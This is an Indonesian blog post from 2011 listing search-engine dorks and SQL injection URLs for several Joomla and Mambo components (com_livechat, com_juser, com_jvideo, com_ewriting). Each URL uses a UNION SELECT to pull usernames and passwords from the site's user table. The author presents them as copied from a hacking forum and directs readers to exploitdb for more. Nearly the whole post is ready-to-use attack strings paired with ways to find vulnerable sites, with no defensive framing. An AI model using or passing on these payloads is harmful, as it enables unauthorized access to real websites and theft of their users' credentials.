Daftar isi

Thanks to :| Allah SWT | Nyokap | My Bie-Pith | All Friends (TK, SD, SMP, SMA, Kuliah, Tongkrongan) | Enemies | Kaskus | Fasthacker | Codenesia | Yogya Free | Indonesian Hacker Team | Semua Situs (Forum) lainnya serta buku-buku yang terkait dalam pembelajaran dan pembentukan Blog ini | and The Last Thanks to You... |
Welcome and Thanks for visiting this blog ...
Sunday, May 15, 2011

Exploits & Bugs Joomla

Joomla Live Chat

Dork:
Code:
Contoh
"option=com_livechat"

Exploit :
Code:
Contoh
"administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users"


Joomla "option=com_juser"

Content

Dork:
Code:
Contoh
"inurl:option=com_jusers"

exploit:
Code:
Contoh
"index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-"



Joomla "com_jvideo"

Content

Dork :
Code:
Contoh
"inurl:option=com_jvideo"

inurl:com_jvideo

exploit:
Code:
Contoh
"index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users"

Joomla "option=com_juser"

Content

Dork:
Code:
Contoh
"inurl:option=com_juser"

exploit:
Code:
Contoh
"index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--"

Joomla com_ewriting


Content

Dorks:
Code:
Contoh
"com_ewriting""

Exploit :

Joomla!
Code:
Contoh
"option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--"

Mambo
Code:
Contoh
"option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--"

Ini beberapa yang saya kutip dari salah satu forum hacking Indonesia. Silahkan cari yang lainnya di exploitdb atau injektor...

0 comments:

Post a Comment

ShoutMix

Follow Me